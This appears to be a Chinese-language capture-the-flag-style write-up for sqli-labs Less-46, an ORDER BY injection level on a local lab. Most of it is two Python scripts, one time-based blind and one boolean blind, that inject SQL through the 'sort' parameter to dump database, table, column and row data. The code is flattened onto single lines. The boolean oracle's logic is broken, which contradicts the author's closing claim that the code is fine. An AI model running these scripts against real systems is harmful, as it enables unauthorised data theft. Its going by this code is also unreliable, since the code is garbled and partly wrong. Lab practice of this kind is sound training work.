sqli-labs 靶场第 46 关:ORDER BY 注入
测试前注意打开小皮面板,并启动 Apache 和 MySQL 服务。
http://127.0.0.1:8080/sqli-labs/ 注意端口不要写错
本文记录利用 ORDER BY 注入技术(在排序字段位置注入),进而实现报错注入和盲注,最终通过 Python 脚本自动化提取数据库名称等信息的过程。
方法一:时间盲注
import requests
import time# 目标 URL
# Base URL of the local sqli-labs Less-46 lab page. The scripts below send
# their payloads in the `sort` query parameter, which is this level's
# ORDER BY injection point.
url = "http://127.0.0.1:8080/sqli-labs/Less-46/"# 时间盲注函数
# Time-based oracle. Sends `payload` as the `sort` parameter and measures the
# wall-clock round trip; a response slower than 3 s is reported as
# "condition true" (the callers' payloads use SLEEP(3) on the true branch).
# Notes for the reader:
#   - The threshold equals the SLEEP duration, so borderline latency is
#     ambiguous, and requests.get is called without a timeout.
#   - Wall-clock timing is a noisy signal on a slow lab VM; false positives
#     show up as garbage characters in the recovered strings.
#   - The misspelled name `injiect_data` is kept because every function below
#     calls it by this name.
# NOTE(review): the paste lost its newlines/indentation; the line below is
# kept verbatim and is not runnable as printed.
def injiect_data(payload):params = {"sort": payload}start_time = time.time()response = requests.get(url, params=params)end_time = time.time()# 如果响应时间超过 3 秒,认为条件成立return end_time - start_time > 3# 获取数据库名
# Recovers DATABASE() one character at a time. For each position 1..19 it
# tries ASCII codes 32..126 and keeps the first one whose payload triggers
# the 3 s delay. A position that never matches is silently skipped (there is
# no end-of-string detection), so the result is only meaningful for names
# shorter than 20 characters and may be missing characters on a noisy link.
def get_database_name():database_name = ""for i in range(1, 20):for ascii_code in range(32, 127):payload = f"1 AND IF(ASCII(SUBSTR(DATABASE(), {i}, 1)) = {ascii_code}, SLEEP(3), 0)"if injiect_data(payload):database_name += chr(ascii_code)breakreturn database_name# 获取表名
# Enumerates table names of `database_name` through information_schema.tables,
# one LIMIT offset at a time, using the same per-character time oracle as
# get_database_name. Enumeration stops at the first offset that yields an
# empty name. `database_name` is interpolated into the SQL string directly,
# so the function assumes it contains no quote characters.
def get_table_names(database_name):table_names = []table_index = 0while True:table_name = ""for i in range(1, 20):for ascii_code in range(32, 127):payload = f"1 AND IF(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema = '{database_name}' LIMIT {table_index}, 1), {i}, 1)) = {ascii_code}, SLEEP(3), 0)"if injiect_data(payload):table_name += chr(ascii_code)breakif table_name:table_names.append(table_name)table_index += 1else:breakreturn table_names# 获取列名
# Enumerates column names of `database_name`.`table_name` through
# information_schema.columns with the same offset-walking / per-character
# scheme as get_table_names; stops at the first offset that yields an empty
# column name. Both names are interpolated into the SQL string unescaped.
def get_column_names(database_name, table_name):column_names = []column_index = 0while True:column_name = ""for i in range(1, 20):for ascii_code in range(32, 127):payload = f"1 AND IF(ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_schema = '{database_name}' AND table_name = '{table_name}' LIMIT {column_index}, 1), {i}, 1)) = {ascii_code}, SLEEP(3), 0)"if injiect_data(payload):column_name += chr(ascii_code)breakif column_name:column_names.append(column_name)column_index += 1else:breakreturn column_names# 获取数据
# Reads the values of a single column, row by row (LIMIT row_index, 1), with
# the same per-character time oracle. Because the loop ends at the first row
# whose recovered value is empty, an empty or NULL cell in the middle of the
# table terminates extraction early, and values are truncated at 19 chars.
def get_data(database_name, table_name, column_name):data = []row_index = 0while True:row_data = ""for i in range(1, 20):for ascii_code in range(32, 127):payload = f"1 AND IF(ASCII(SUBSTR((SELECT {column_name} FROM {database_name}.{table_name} LIMIT {row_index}, 1), {i}, 1)) = {ascii_code}, SLEEP(3), 0)"if injiect_data(payload):row_data += chr(ascii_code)breakif row_data:data.append(row_data)row_index += 1else:breakreturn data# 主程序
# Driver: database name -> tables -> columns -> values, printing each stage.
# Every (position, candidate) pair costs one HTTP request and each hit costs a
# 3 s sleep, so a full run is slow and extremely visible: long bursts of
# sequential requests whose `sort` parameter contains IF/SLEEP/SUBSTR against
# a single page, plus abnormal DB query times, are the detection signature a
# WAF or log review would key on.
if __name__ == "__main__":# 获取数据库名database = get_database_name()print(f"数据库名: {database}")# 获取表名tables = get_table_names(database)print(f"表名: {tables}")for table in tables:# 获取列名columns = get_column_names(database, table)print(f"表 {table} 的列名: {columns}")for column in columns:# 获取数据data = get_data(database, table, column)print(f"表 {table} 的 {column} 列的数据: {data}")
方法二:布尔盲注
import requests# 目标 URL
# Base URL of the local sqli-labs Less-46 lab page; payloads again go in the
# `sort` query parameter (see injiect_data below).
url = "http://127.0.0.1:8080/sqli-labs/Less-46/"# 布尔盲注函数
# Boolean oracle. Fetches the page twice, once per payload, and reports
# whether the two response bodies differ.
# NOTE(review): every caller passes a predicate and its exact complement
# (`> n` versus `<= n`), so a difference between the two bodies only shows
# that the page reacts to the predicate at all -- it does not say which side
# is true. When the target does react, this returns True already for the
# first candidate (n = 32), and the callers then append chr(33) for every
# position. That contradicts the closing remark on this page that the script
# itself is correct; the comparison logic, not the database, is the first
# thing to look at when the output is wrong.
# No timeout is set on either requests.get call.
def injiect_data(payload_true, payload_false):params_true = {"sort": payload_true}params_false = {"sort": payload_false}response_true = requests.get(url, params=params_true)response_false = requests.get(url, params=params_false)return response_true.text != response_false.text# 获取数据库名
# Boolean-blind variant of the database-name recovery: for each position
# 1..19 it walks ASCII codes 32..126 upward and, at the first code where the
# oracle reports a difference, appends chr(ascii_code + 1). Positions with no
# hit are skipped; there is no end-of-string detection.
def get_database_name():database_name = ""for i in range(1, 20):for ascii_code in range(32, 127):payload_true = f"1 AND ASCII(SUBSTR(DATABASE(), {i}, 1)) > {ascii_code}"payload_false = f"1 AND ASCII(SUBSTR(DATABASE(), {i}, 1)) <= {ascii_code}"if injiect_data(payload_true, payload_false):database_name += chr(ascii_code + 1)breakreturn database_name# 获取表名
# Boolean-blind table enumeration via information_schema.tables, walking
# LIMIT offsets until an offset yields an empty name; each character is the
# first candidate (+1) at which the oracle reports a difference.
# `database_name` is interpolated into the SQL string unescaped.
def get_table_names(database_name):table_names = []table_index = 0while True:table_name = ""for i in range(1, 20):for ascii_code in range(32, 127):payload_true = f"1 AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema = '{database_name}' LIMIT {table_index}, 1), {i}, 1)) > {ascii_code}"payload_false = f"1 AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema = '{database_name}' LIMIT {table_index}, 1), {i}, 1)) <= {ascii_code}"if injiect_data(payload_true, payload_false):table_name += chr(ascii_code + 1)breakif table_name:table_names.append(table_name)table_index += 1else:breakreturn table_names# 获取列名
# Boolean-blind column enumeration via information_schema.columns for one
# table, same offset-walking / per-character scheme as get_table_names;
# stops at the first offset that yields an empty column name.
def get_column_names(database_name, table_name):column_names = []column_index = 0while True:column_name = ""for i in range(1, 20):for ascii_code in range(32, 127):payload_true = f"1 AND ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_schema = '{database_name}' AND table_name = '{table_name}' LIMIT {column_index}, 1), {i}, 1)) > {ascii_code}"payload_false = f"1 AND ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_schema = '{database_name}' AND table_name = '{table_name}' LIMIT {column_index}, 1), {i}, 1)) <= {ascii_code}"if injiect_data(payload_true, payload_false):column_name += chr(ascii_code + 1)breakif column_name:column_names.append(column_name)column_index += 1else:breakreturn column_names# 获取数据
# Boolean-blind read of one column's values, row by row (LIMIT row_index, 1).
# The loop ends at the first row whose recovered value is empty, so an empty
# or NULL cell stops extraction early; values are truncated at 19 characters.
def get_data(database_name, table_name, column_name):data = []row_index = 0while True:row_data = ""for i in range(1, 20):for ascii_code in range(32, 127):payload_true = f"1 AND ASCII(SUBSTR((SELECT {column_name} FROM {database_name}.{table_name} LIMIT {row_index}, 1), {i}, 1)) > {ascii_code}"payload_false = f"1 AND ASCII(SUBSTR((SELECT {column_name} FROM {database_name}.{table_name} LIMIT {row_index}, 1), {i}, 1)) <= {ascii_code}"if injiect_data(payload_true, payload_false):row_data += chr(ascii_code + 1)breakif row_data:data.append(row_data)row_index += 1else:breakreturn data# 主程序
# Driver: database name -> tables -> columns -> values, printing each stage.
# The boolean variant issues two requests per (position, candidate) pair, so
# it is faster than the time-based script but just as noisy in access logs:
# long runs of paired requests to one page whose `sort` parameter carries
# ASCII/SUBSTR comparisons are the pattern a WAF or log review would flag.
if __name__ == "__main__":# 获取数据库名database = get_database_name()print(f"数据库名: {database}")# 获取表名tables = get_table_names(database)print(f"表名: {tables}")for table in tables:# 获取列名columns = get_column_names(database, table)print(f"表 {table} 的列名: {columns}")for column in columns:# 获取数据data = get_data(database, table, column)print(f"表 {table} 的 {column} 列的数据: {data}")
此处代码本身没有问题;排查错误后发现是数据库连不上或数据库内容丢失,后面会再次修改。